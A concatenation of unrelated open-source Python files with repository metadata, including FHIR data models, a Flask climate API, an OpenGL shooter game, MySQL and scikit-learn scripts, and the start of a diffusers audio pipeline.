purpose: fhirtypes.Markdown = Field(
None,
alias="purpose",
title="Why this structure definition is defined",
description=(
"Explanation of why this structure definition is needed and why it has "
"been designed as it has."
),
# if property is element of this resource.
element_property=True,
)
purpose__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_purpose", title="Extension field for ``purpose``."
)
snapshot: fhirtypes.StructureDefinitionSnapshotType = Field(
None,
alias="snapshot",
title="Snapshot view of the structure",
description=(
"A snapshot view is expressed in a standalone form that can be used and"
" interpreted without considering the base StructureDefinition."
),
# if property is element of this resource.
element_property=True,
)
status: fhirtypes.Code = Field(
...,
alias="status",
title="draft | active | retired | unknown",
description=(
"The status of this structure definition. Enables tracking the life-"
"cycle of the content."
),
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["draft", "active", "retired", "unknown"],
)
status__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_status", title="Extension field for ``status``."
)
title: fhirtypes.String = Field(
None,
alias="title",
title="Name for this structure definition (human friendly)",
description=(
"A short, descriptive, user-friendly title for the structure " "definition."
),
# if property is element of this resource.
element_property=True,
)
title__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_title", title="Extension field for ``title``."
)
type: fhirtypes.Uri = Field(
...,
alias="type",
title="Type defined or constrained by this structure",
description=(
"The type this structure describes. If the derivation kind is "
"'specialization' then this is the master definition for a type, and "
"there is always one of these (a data type, an extension, a resource, "
"including abstract ones). Otherwise the structure definition is a "
"constraint on the stated type (and in this case, the type cannot be an"
" abstract type). References are URLs that are relative to "
'http://hl7.org/fhir/StructureDefinition e.g. "string" is a reference '
"to http://hl7.org/fhir/StructureDefinition/string. Absolute URLs are "
"only allowed in logical models."
),
# if property is element of this resource.
element_property=True,
)
type__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_type", title="Extension field for ``type``."
)
url: fhirtypes.Uri = Field(
...,
alias="url",
title=(
"Canonical identifier for this structure definition, represented as a "
"URI (globally unique)"
),
description=(
"An absolute URI that is used to identify this structure definition "
"when it is referenced in a specification, model, design or an "
"instance; also called its canonical identifier. This SHOULD be "
"globally unique and SHOULD be a literal address at which at which an "
"authoritative instance of this structure definition is (or will be) "
"published. This URL can be the target of a canonical reference. It "
"SHALL remain the same when the structure definition is stored on "
"different servers."
),
# if property is element of this resource.
element_property=True,
)
url__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_url", title="Extension field for ``url``."
)
useContext: ListType[fhirtypes.UsageContextType] = Field(
None,
alias="useContext",
title="The context that the content is intended to support",
description=(
"The content was developed with a focus and intent of supporting the "
"contexts that are listed. These contexts may be general categories "
"(gender, age, ...) or may be references to specific programs "
"(insurance plans, studies, ...) and may be used to assist with "
"indexing and searching for appropriate structure definition instances."
),
# if property is element of this resource.
element_property=True,
)
version: fhirtypes.String = Field(
None,
alias="version",
title="Business version of the structure definition",
description=(
"The identifier that is used to identify this version of the structure "
"definition when it is referenced in a specification, model, design or "
"instance. This is an arbitrary value managed by the structure "
"definition author and is not expected to be globally unique. For "
"example, it might be a timestamp (e.g. yyyymmdd) if a managed version "
"is not available. There is also no expectation that versions can be "
"placed in a lexicographical sequence."
),
# if property is element of this resource.
element_property=True,
)
version__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_version", title="Extension field for ``version``."
)
class StructureDefinitionContext(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` does't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
If an extension, where it can be used in instances.
Identifies the types of resource or data type elements to which the
extension can be applied.
"""
resource_type = Field("StructureDefinitionContext", const=True)
expression: fhirtypes.String = Field(
...,
alias="expression",
title="Where the extension can be used in instances",
description=(
"An expression that defines where an extension can be used in " "resources."
),
# if property is element of this resource.
element_property=True,
)
expression__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_expression", title="Extension field for ``expression``."
)
type: fhirtypes.Code = Field(
...,
alias="type",
title="fhirpath | element | extension",
description=(
"Defines how to interpret the expression that defines what the context "
"of the extension is."
),
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["fhirpath", "element", "extension"],
)
type__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_type", title="Extension field for ``type``."
)
class StructureDefinitionDifferential(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` does't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Differential view of the structure.
A differential view is expressed relative to the base StructureDefinition -
a statement of differences that it applies.
"""
resource_type = Field("StructureDefinitionDifferential", const=True)
element: ListType[fhirtypes.ElementDefinitionType] = Field(
...,
alias="element",
title="Definition of elements in the resource (if no StructureDefinition)",
description="Captures constraints on each element within the resource.",
# if property is element of this resource.
element_property=True,
)
class StructureDefinitionMapping(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` does't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
External specification that the content is mapped to.
An external specification that the content is mapped to.
"""
resource_type = Field("StructureDefinitionMapping", const=True)
comment: fhirtypes.String = Field(
None,
alias="comment",
title="Versions, Issues, Scope limitations etc.",
description=(
"Comments about this mapping, including version notes, issues, scope "
"limitations, and other important notes for usage."
),
# if property is element of this resource.
element_property=True,
)
comment__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_comment", title="Extension field for ``comment``."
)
identity: fhirtypes.Id = Field(
...,
alias="identity",
title="Internal id when this mapping is used",
description=(
"An Internal id that is used to identify this mapping set when specific"
" mappings are made."
),
# if property is element of this resource.
element_property=True,
)
identity__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_identity", title="Extension field for ``identity``."
)
name: fhirtypes.String = Field(
None,
alias="name",
title="Names what this mapping refers to",
description="A name for the specification that is being mapped to.",
# if property is element of this resource.
element_property=True,
)
name__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_name", title="Extension field for ``name``."
)
uri: fhirtypes.Uri = Field(
None,
alias="uri",
title="Identifies what this mapping refers to",
description=(
"An absolute URI that identifies the specification that this mapping is"
" expressed to."
),
# if property is element of this resource.
element_property=True,
)
uri__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_uri", title="Extension field for ``uri``."
)
class StructureDefinitionSnapshot(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` does't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Snapshot view of the structure.
A snapshot view is expressed in a standalone form that can be used and
interpreted without considering the base StructureDefinition.
"""
resource_type = Field("StructureDefinitionSnapshot", const=True)
element: ListType[fhirtypes.ElementDefinitionType] = Field(
...,
alias="element",
title="Definition of elements in the resource (if no StructureDefinition)",
description="Captures constraints on each element within the resource.",
# if property is element of this resource.
element_property=True,
)
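# A minimal construction sketch (assumption: the field values below are purely
# illustrative and not taken from any real profile); it fills only the fields
# declared as required (``...``) on the StructureDefinition model above.
def _example_structure_definition() -> StructureDefinition:
    return StructureDefinition(
        url="http://example.org/fhir/StructureDefinition/example-profile",
        name="ExampleProfile",
        status="draft",
        kind="resource",
        abstract=False,
        type="Patient",
    )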
| [
"[email protected]"
] | |
6b71d3d92d65401d6fb5407d1cf62f26725c9907 | d9e093c9dde225f7aa93a55dd9f8cef7a31554b8 | /src/Model.py | f2309dd1227532fde1d65124e17a0f4ca18d5f00 | [] | no_license | bhaskarnn9/Decision_Tree | 82ea3f2c75da35b223dd3ad03c1ee569e13261ea | 6c2f6cef6b4572a8fe9bc49651a8d6d46b589604 | refs/heads/master | 2021-01-09T17:51:52.382457 | 2020-02-28T17:25:08 | 2020-02-28T17:25:08 | 242,396,845 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 177 | py | from sklearn.tree import DecisionTreeClassifier
def model(x_train, y_train):
model_dt = DecisionTreeClassifier()
model_dt.fit(x_train, y_train)
return model_dt
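# A small usage sketch (assumption: the iris data below is illustrative and not
# part of the original project); it shows how the helper above is called.
if __name__ == "__main__":
    from sklearn.datasets import load_iris
    from sklearn.model_selection import train_test_split
    x, y = load_iris(return_X_y=True)
    x_train, x_test, y_train, y_test = train_test_split(x, y, random_state=0)
    model_dt = model(x_train, y_train)
    print("test accuracy:", model_dt.score(x_test, y_test))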
| [
"[email protected]"
] | |
18af521eec108724726ec5adcdda8d372e30cc21 | b452bec081866efe25bab30b98d84181e766735f | /Aula 11.py | fbb66cb3819324b8e176ea596a0d5312b0c0b27f | [
"MIT"
] | permissive | camiloprado/Curso-Python | d40fe11019e410914d4dfaf6f14abcb63e4fdbb6 | de7ab850c3010397ef8d82531757e4e4339d1bb6 | refs/heads/main | 2023-03-07T08:29:18.234983 | 2021-02-28T22:50:13 | 2021-02-28T22:50:13 | 343,232,384 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | T = float(input('Digite a temperatura em °C:'))
F = T * 1.8 + 32
K = T + 273.15
print('A temperatura em:\nFahrenheit: {}°F\nKelvin: {}K'.format(F, K)) | [
"[email protected]"
] | |
5a70b3dd55fd3d9c45bbbf134b407923549c6c38 | 50edd95cf9ea295b4216e10361a3dfc7e029a660 | /anipose/train_autoencoder.py | e5534bcc6a314c1726f5d863fc601e59da0b5da8 | [
"BSD-2-Clause"
] | permissive | goyallon/anipose | 5fc03b66b5a362d8ea151c6df4cc6049bccabb15 | 2239cd04f1e6d1f21ff62aab005ebfe6fed351c8 | refs/heads/master | 2022-11-05T06:59:14.077907 | 2020-06-15T23:39:10 | 2020-06-15T23:39:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,255 | py | #!/usr/bin/env python3
from sklearn.neural_network import MLPRegressor, MLPClassifier
import pandas as pd
import os.path
import numpy as np
from glob import glob
from ruamel.yaml import YAML
import pickle
def get_dataset_location(model_folder):
config_fname = os.path.join(model_folder, 'config.yaml')
yaml = YAML(typ='rt')
with open(config_fname, 'r') as f:
dlc_config = yaml.load(f)
iternum = dlc_config['iteration']
fname_pat = os.path.join(
model_folder, 'training-datasets', 'iteration-'+str(iternum),
'*', 'CollectedData_*.h5')
fname = glob(fname_pat)[0]
return fname
def load_pose_2d_training(fname):
data_orig = pd.read_hdf(fname)
scorer = data_orig.columns.levels[0][0]
data = data_orig.loc[:, scorer]
bp_index = data.columns.names.index('bodyparts')
coord_index = data.columns.names.index('coords')
bodyparts = list(data.columns.get_level_values(bp_index).unique())
n_frames = len(data)
n_joints = len(bodyparts)
test = np.array(data).reshape(n_frames, n_joints, 2)
bad = np.any(~np.isfinite(test), axis=2)
test[bad] = np.nan
metadata = {
'bodyparts': bodyparts,
'scorer': scorer,
'index': data.index
}
return test, metadata
def generate_training_data(scores, n_iters=10):
Xs = []
ys = []
for i in range(n_iters):
scores_perturb = scores.copy()
good = scores_perturb == 1
scores_perturb[good] = np.random.normal(1, 0.3, size=np.sum(good))
scores_perturb[~good] = np.random.normal(0, 0.3, size=np.sum(~good))
flipped = np.random.uniform(size=good.shape) < 0.05
scores_perturb = np.clip(scores_perturb, 0, 1)
scores_perturb[flipped] = 1 - scores_perturb[flipped]
Xs.append(scores_perturb)
ys.append(scores)
X = np.vstack(Xs)
y = np.vstack(ys)
return X, y
def train_mlp_classifier(X, y):
hidden = X.shape[1]
mlp = MLPClassifier(hidden_layer_sizes=(hidden),
verbose=2, max_iter=2000,
activation='tanh',
learning_rate='adaptive', solver='adam',
early_stopping=True)
mlp.fit(X, y)
return mlp
def save_mlp_classifier(mlp, fname):
with open(fname, 'wb') as f:
pickle.dump(mlp, f)
print('autoencoder saved at:\n {}'.format(fname))
def train_autoencoder(config):
model_folder = config['model_folder']
data_fname = get_dataset_location(model_folder)
data, metadata = load_pose_2d_training(data_fname)
n_frames, n_joints, _ = data.shape
scores = np.ones((n_frames, n_joints), dtype='float64')
bad = np.any(~np.isfinite(data), axis=2)
scores[bad] = 0
X, y = generate_training_data(scores)
mlp = train_mlp_classifier(X, y)
out_fname = os.path.join(config['path'], 'autoencoder.pickle')
save_mlp_classifier(mlp, out_fname)
# model_folder = '/jellyfish/research/tuthill/hand-demo-dlc-TuthillLab-2019-08-05'
# config = {'model_folder': model_folder, 'path': model_folder}
# train_autoencoder(config)
# get dataset from deeplabcut folder
# generate augmented dataset to train autoencoder
# train MLP classifier
# save result
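# A minimal invocation sketch (assumption: the folder passed on the command line
# is a DeepLabCut project containing config.yaml and a training dataset, as in
# the commented-out example above).
if __name__ == '__main__':
    import sys
    folder = sys.argv[1] if len(sys.argv) > 1 else '.'
    train_autoencoder({'model_folder': folder, 'path': folder})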
| [
"[email protected]"
] | |
220f90b48520a6be2e038fa30ada57931ce95040 | d88aa7b0bd55f73d9ac705f18e24cfb8fcd13a63 | /tests/test_user/test_user_model.py | 64ec45d5d04938fa3cdcae92750ee3002fd10daa | [] | no_license | guidiego/pylerplate | 0f8f826a2e0349d97968874a2b2c3827aa9e2d9a | 03adeeeb8b443b214e5237f40048895b491c6487 | refs/heads/master | 2020-05-02T22:54:37.276176 | 2019-07-09T20:04:37 | 2019-07-09T20:04:37 | 178,266,287 | 0 | 0 | null | 2019-04-04T14:08:36 | 2019-03-28T19:05:29 | null | UTF-8 | Python | false | false | 858 | py | import pytest
from app import bcrypt
from modules.user.models import User
from utils.errors import AuthenticationError
user_info = {
'email': '[email protected]',
'name': 'Test2',
'password': '123456'
}
def test_create_user():
new_user = User(**user_info)
new_user.save()
assert new_user.email == user_info['email']
assert new_user.name == user_info['name']
assert bcrypt.check_password_hash(
new_user.password,
user_info['password']
) is True
def test_user_credentials():
user = User.verify_credentials(user_info['email'], user_info['password'])
assert user.email == user_info['email']
def test_user_failed_credentials():
with pytest.raises(AuthenticationError):
User.verify_credentials(
'[email protected]',
user_info['password']
)
| [
"[email protected]"
] | |
4b6919850f299c61adeca136eb8288fc0dc88ade | c1cf94d9286a88457130448e1e8724b015cf7df3 | /jogo.py | 0372e8045a436d71466ed13b5b35430bf7982c7d | [] | no_license | arthur-sabioni/JogoPythonOpenGL | 55883356f32b16426c523118746a4db28a59b4d0 | 7b9902e968659fa13bc573500df260befdc5e32c | refs/heads/master | 2022-11-17T02:42:43.849786 | 2020-07-08T20:25:43 | 2020-07-08T20:25:43 | 278,186,152 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,560 | py | from OpenGL.GL import *
from OpenGL.GLUT import *
from OpenGL.GLU import *
import pygame
from JogadorClass import Jogador
from AtiradorClass import Atirador
from RazanteClass import Razante
from TelaClass import Tela
from random import randint
def loadImage(image):
textureSurface = pygame.image.load(image)
textureData = pygame.image.tostring(textureSurface, "RGB", 1)
width = textureSurface.get_width()
height = textureSurface.get_height()
texture = glGenTextures(1)
glBindTexture(GL_TEXTURE_2D, texture)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)
glTexImage2D(GL_TEXTURE_2D, 0, GL_RGB, width, height, 0, GL_RGB,GL_UNSIGNED_BYTE, textureData)
return texture
#textures
t0 = loadImage("./Texturas/coracao.png")
w,h=1000,1000
#Number of shooting enemies, starting from index 0
numAtiradores = 14
#Percent chance that an enemy or diver activates on each cycle
agressividade = 5
#player (global variable)
j = Jogador()
#Screen object that tracks the current game stage, plus the background and on-screen sprites
t = Tela(j,t0)
#shooter enemies
a00 = Atirador(875,925)
a01 = Atirador(775,925)
a02 = Atirador(675,925)
a03 = Atirador(575,925)
a04 = Atirador(475,925)
a10 = Atirador(875,825)
a11 = Atirador(775,825)
a12 = Atirador(675,825)
a13 = Atirador(575,825)
a14 = Atirador(475,825)
a20 = Atirador(875,725)
a21 = Atirador(775,725)
a22 = Atirador(675,725)
a23 = Atirador(575,725)
a24 = Atirador(475,725)
alist = [a00,a01,a02,a03,a04,a10,a11,a12,a13,a14,a20,a21,a22,a23,a24]
#diving enemies
r00 = Razante(975,925)
r01 = Razante(375,925)
r10 = Razante(975,825)
r11 = Razante(375,825)
r20 = Razante(975,725)
r21 = Razante(375,725)
rlist = [r00,r01,r10,r11,r20,r21]
#list of all enemies combined
elist = alist + rlist
etiros = []
def quadrado(posx,posy,h,l):
glColor3f(0.0, 1.0, 0.0)
glPushMatrix()
glBegin(GL_TRIANGLE_FAN)
glVertex2f(posx-l/2, posy-h/2)
glVertex2f(posx+l/2, posy-h/2)
glVertex2f(posx+l/2, posy+h/2)
glVertex2f(posx-l/2, posy+h/2)
glEnd()
glPopMatrix()
def quadradoTextura(posx,posy,h,l,textura):
glColor3f(1.0, 1.0, 1.0)
glEnable(GL_TEXTURE_2D)
glBindTexture(GL_TEXTURE_2D,textura)
glPushMatrix()
glBegin(GL_TRIANGLE_FAN)
glTexCoord2f(0,0)
glVertex2f(posx-l/2, posy-h/2)
glTexCoord2f(1,0)
glVertex2f(posx+l/2, posy-h/2)
glTexCoord2f(1,1)
glVertex2f(posx+l/2, posy+h/2)
glTexCoord2f(0,1)
glVertex2f(posx-l/2, posy+h/2)
glEnd()
glPopMatrix()
glDisable(GL_TEXTURE_2D)
def tiroJogador():
j.moverTiro()
def moverInimigos():
    #move right when the formation touches the left edge
    if r01.getX() < 25:
        for x in elist:
            x.setDir(1)
            x.setY(x.getY()-100) #descend 100px
    #move left when the formation touches the right edge
    elif r00.getX() > 975:
        for x in elist:
            x.setDir(-1)
            x.setY(x.getY()-100) #descend 100px
    for x in elist:
        x.movimentar()
    #oscillating up-and-down movement (not implemented yet)
def moverJogador():
    #keyboard movement
if j.getA():
j.moverT(-1)
elif j.getD():
j.moverT(1)
def checarColisaoPlayer():
    #check whether each shot has been fired; if so, test its collision against every enemy
for x in j.getTiros():
if x.atirado == True:
for y in elist:
if checarColisaoRetangulos(y.getX(),y.getY(),y.getL(),y.getH(),x.getX(),x.getY(),10,50) and y.getVivo():
y.setVivo(False)
x.setAtirado(False)
def checarColisaoTiros():
for x in etiros:
if x.atirado == True:
if checarColisaoRetangulos(x.getX(),x.getY(),10,50,j.getX(),j.getY(),j.getL(),j.getH()):
j.setVidas(j.getVidas()-1)
x.setAtirado(False)
t.atualizarSprites()
def checarColisaoRetangulos(ax,ay,al,ah,bx,by,bl,bh):
colisaoX = False
if ax + al/2 >= bx - bl/2 and bx + bl/2 >= ax - al/2:
colisaoX = True
colisaoY = False
if ay + ah/2 >= by - bh/2 and by + bh/2 >= ay - ah/2:
colisaoY = True
return colisaoX and colisaoY
def tiroInimigos():
global etiros,alist
    #chance for an enemy to shoot on every update
    temp1 = randint(0,100)
    #percent chance
    if temp1 < agressividade:
        temp2 = randint(0,numAtiradores) #pick at random which enemy will shoot
        temp3 = 0 #count up until reaching the enemy that will shoot
        for x in alist:
            if temp3 != temp2:
                temp3 += 1
            elif x.getTiro().getAtirado() == False and x.getVivo() == True:
                x.atirar()
                # Some shots end up in the list twice and therefore move twice per update;
                # calling that a feature rather than a bug since the extra variety is welcome,
                # even though it could be fixed by removing duplicates before moving them
                etiros.append(x.getTiro())
                break
    #move the shots
    for x in etiros:
        #if the shot has hit something or left the screen, remove it from the list
if x.getAtirado() == False:
etiros.remove(x)
else:
x.mover()
def redimensiona(width,height):
    #keep the aspect ratio
global w,h
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(0, w, 0, h, -1, 1)
razaoAspectoJanela = (width)/height
razaoAspectoMundo = (w)/h
if razaoAspectoJanela < razaoAspectoMundo:
hViewport = width / razaoAspectoMundo
yViewport = (height - hViewport)/2
glViewport(0, yViewport, width, hViewport)
elif razaoAspectoJanela > razaoAspectoMundo:
wViewport = (height) * razaoAspectoMundo
xViewport = (width - wViewport)/2
glViewport(xViewport, 0, wViewport, height)
else:
glViewport(0, 0, width, height)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
def iterate():
global w,h
glViewport(0, 0, w, h)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(0.0, w, 0.0, h, 0.0, 1.0)
glMatrixMode (GL_MODELVIEW)
glLoadIdentity()
def desenhaCena():
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glLoadIdentity()
iterate()
    #draw the player
    quadrado(j.getX(),j.getY(),j.getL(),j.getH())
    #draw the enemies
    for x in elist:
        if x.getVivo() == True:
            quadrado(x.getX(),x.getY(),x.getL(),x.getH())
    #draw the player's shots
    for x in j.getTiros():
        if x.getAtirado():
            quadrado(x.getX(),x.getY(),50,10)
    #draw the enemies' shots
    for x in etiros:
        quadrado(x.getX(),x.getY(),50,10)
    #draw the screen sprites
for x in t.getSprites():
quadradoTextura(x.getX(),x.getY(),x.getL(),x.getH(),0)
glutSwapBuffers()
def atualizaCena(periodo):
if t.getEstagio() == "jogo":
        #update the player's shot
        tiroJogador()
        #movement
        moverInimigos()
        moverJogador()
        #enemy actions
        tiroInimigos()
        #check collisions of the player's shots
        checarColisaoPlayer()
        #check collisions of the enemies' shots
checarColisaoTiros()
if j.getVidas() == 0:
t.setEstagio("game over")
glutPostRedisplay()
glutTimerFunc(periodo,atualizaCena,periodo)
def inicializar():
glEnable(GL_BLEND )
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
def teclado(key,x,y):
if key == b'd':
j.setD(True)
elif key == b'a':
j.setA(True)
elif key == b' ':
j.atirar()
def tecladoUp(key,x,y):
if key == b'd':
j.setD(False)
elif key == b'a':
j.setA(False)
def movimentoMouse(x,y):
if t.getEstagio() == "jogo":
j.moverM(x,y)
def clickMouse(key,state,x,y):
if key == GLUT_LEFT_BUTTON and state == GLUT_DOWN and t.getEstagio() == "jogo":
j.atirar()
if __name__ == "__main__":
glutInit()
glutInitDisplayMode(GLUT_DOUBLE | GLUT_RGBA)
glutInitWindowSize(1000, 1000)
glutInitWindowPosition(0, 0)
wind = glutCreateWindow("jojo do zilla")
inicializar()
glutDisplayFunc(desenhaCena)
    #glutReshapeFunc(redimensiona) #not working
glutKeyboardFunc(teclado)
glutKeyboardUpFunc(tecladoUp)
glutPassiveMotionFunc(movimentoMouse)
glutMouseFunc(clickMouse)
glutTimerFunc(0,atualizaCena,33)
glutMainLoop() | [
"[email protected]"
] | |
964cfab6381ea5b1a9577e79c16426b7beb2cab5 | 01eca44be6eb85a0e67a2d0c6e8abf4ac26d7fcc | /venv/Scripts/pip3-script.py | 65dd573485a27e533b1ac3f07422090272f7da8b | [] | no_license | davrivas/python-learning | f44335333f50a4699d0e3d688e2c6aa3513c7162 | 2f1eec1d52099d68ca727af96ebfde828406eafb | refs/heads/master | 2020-07-15T15:22:45.494393 | 2019-08-31T21:03:49 | 2019-08-31T21:03:49 | 205,591,039 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 420 | py | #!C:\Users\davr\PycharmProjects\python-learning\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3')()
)
| [
"[email protected]"
] | |
bfd0efb0e36b0b024bbc189449f2c3d4196954f4 | 6532c9e25a1e664826c9f527b2a948522a7b675b | /data analyze/database/kuyun_word_create_table.py | 32a0274f123c5977d9ba127d8d7f0f4d20f95a9e | [] | no_license | maxin5452/coolyun | f1fa485d387619e4eac6c0722538c0bc60776882 | dc458187a110b0ad12618c6f15d5e0c225bf0af2 | refs/heads/master | 2021-01-20T07:00:08.433740 | 2017-08-27T14:30:36 | 2017-08-27T14:30:36 | 101,525,090 | 0 | 0 | null | 2017-08-27T02:39:47 | 2017-08-27T02:28:13 | null | UTF-8 | Python | false | false | 752 | py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
import MySQLdb
# Open the database connection
db= MySQLdb.connect(
host='127.0.0.1',
port = 3306,
user='root',
passwd='000000',
db ='testdb',
)
# Use the cursor() method to get a cursor
cursor = db.cursor()
# If the table already exists, drop it with execute().
cursor.execute("DROP TABLE IF EXISTS WORD")
# SQL statement for creating the table
sql = """CREATE TABLE WORD (
name CHAR(20) NOT NULL,
file_stamp VARCHAR(100),
file_time DATETIME,
userUrl VARCHAR(250),
region VARCHAR(30),
rank INT UNSIGNED,
count FLOAT )"""
cursor.execute(sql)
# Close the database connection
db.close()
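# A follow-up sketch (assumption: the row values are placeholders) showing how a
# record could be inserted into the WORD table created above; it is defined as a
# function and never called, so running this script still only creates the table.
def insert_example_word_row():
    conn = MySQLdb.connect(host='127.0.0.1', port=3306, user='root',
                           passwd='000000', db='testdb')
    cur = conn.cursor()
    cur.execute(
        "INSERT INTO WORD (name, file_stamp, file_time, userUrl, region, rank, count) "
        "VALUES (%s, %s, %s, %s, %s, %s, %s)",
        ('example', 'stamp-001', '2017-08-27 14:30:36', 'http://example.com', 'CN', 1, 0.5))
    conn.commit()
    conn.close()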
| [
"[email protected]"
] | |
aa4343291122dd23416402289795bff275cac613 | f301c6e7c7b97fac42c03db9a25575f9f396912d | /app.py | 501baea045324cabfc3dc110ef056b80a2cdc77b | [] | no_license | asukmawan/surfs_up | d4c2934d1f0825ad7f3cc4bba83c8f45b4db5956 | 59574419caa8d2b749b09575098b8efd1e176d21 | refs/heads/main | 2023-02-13T02:27:24.886423 | 2020-12-20T14:35:40 | 2020-12-20T14:35:40 | 321,559,490 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,900 | py | # Setup the weather app
#1. import dependencies
import datetime as dt
import numpy as np
import pandas as pd
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
from flask import Flask, jsonify
# Setup the Database
engine = create_engine("sqlite:///hawaii.sqlite")
# Use automap_base() to put the database into classes and .prepare() to reflect the tables into SQLAlchemy
Base = automap_base()
Base.prepare(engine, reflect=True)
# Save our references to each table - Create a variable for each of the classes so we can reference them later
Measurement = Base.classes.measurement
Station = Base.classes.station
# Create a session link from Python to the Database
session = Session(engine)
# Create a flask application, being sure to pass __name__ in the app variable - we are putting the flask object into the app variable
app = Flask(__name__)
# Define our route - what to do when a user hits the index route - in this case this is the homepage - this is a static route
@app.route('/')
def welcome():
return (
'''
Welcome to the Climate Analysis API!
Available Routes:
/api/v1.0/precipitation
/api/v1.0/stations
/api/v1.0/tobs
/api/v1.0/temp/start/end
''')
# Create the precipitation route
@app.route('/api/v1.0/precipitation')
def precipitation():
prev_year = dt.date(2017, 8, 23) - dt.timedelta(days=365)
precipitation = session.query(Measurement.date, Measurement.prcp).\
filter(Measurement.date >= prev_year).all()
precip = {date: prcp for date, prcp in precipitation}
return jsonify(precip)
# Completed stations route
@app.route('/api/v1.0/stations')
def stations():
results = session.query(Station.station).all()
stations = list(np.ravel(results))
return jsonify(stations=stations)
# Completed Monthly Temperature Route
@app.route("/api/v1.0/tobs")
def temp_monthly():
prev_year = dt.date(2017, 8, 23) - dt.timedelta(days=365)
results = session.query(Measurement.tobs).\
filter(Measurement.station == 'USC00519281').\
filter(Measurement.date >= prev_year).all()
temps = list(np.ravel(results))
return jsonify(temps=temps)
# Completed Stats for Date Range Route
@app.route("/api/v1.0/temp/<start>")
@app.route("/api/v1.0/temp/<start>/<end>")
def stats(start=None, end=None):
sel = [func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)]
    # When no end date is supplied, only filter from the start date onward;
    # comparing against a missing `end` would otherwise match no rows.
    if not end:
        results = session.query(*sel).\
            filter(Measurement.date >= start).all()
        temps = list(np.ravel(results))
        return jsonify(temps=temps)
results = session.query(*sel).\
filter(Measurement.date >= start).\
filter(Measurement.date <= end).all()
temps = list(np.ravel(results))
return jsonify(temps=temps) | [
"[email protected]"
] | |
4b95149358f6dfefe0687c5d6e8ae4f54758fb4a | b74320ad439e37dfa48cd8db38dab3b7a20a36ff | /src/diffusers/pipelines/dance_diffusion/pipeline_dance_diffusion.py | b2d46c6f90f142635dec50da02b00fe63b3e40c2 | [
"Apache-2.0"
] | permissive | huggingface/diffusers | c82beba1ec5f0aba01b6744040a5accc41ec2493 | 5eeedd9e3336882d598091e191559f67433b6427 | refs/heads/main | 2023-08-29T01:22:52.237910 | 2023-08-28T18:16:27 | 2023-08-28T18:16:27 | 498,011,141 | 17,308 | 3,158 | Apache-2.0 | 2023-09-14T20:57:44 | 2022-05-30T16:04:02 | Python | UTF-8 | Python | false | false | 6,254 | py | # Copyright 2023 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import List, Optional, Tuple, Union
import torch
from ...utils import logging, randn_tensor
from ..pipeline_utils import AudioPipelineOutput, DiffusionPipeline
logger = logging.get_logger(__name__) # pylint: disable=invalid-name
class DanceDiffusionPipeline(DiffusionPipeline):
r"""
Pipeline for audio generation.
This model inherits from [`DiffusionPipeline`]. Check the superclass documentation for the generic methods
implemented for all pipelines (downloading, saving, running on a particular device, etc.).
Parameters:
unet ([`UNet1DModel`]):
A `UNet1DModel` to denoise the encoded audio.
scheduler ([`SchedulerMixin`]):
A scheduler to be used in combination with `unet` to denoise the encoded audio latents. Can be one of
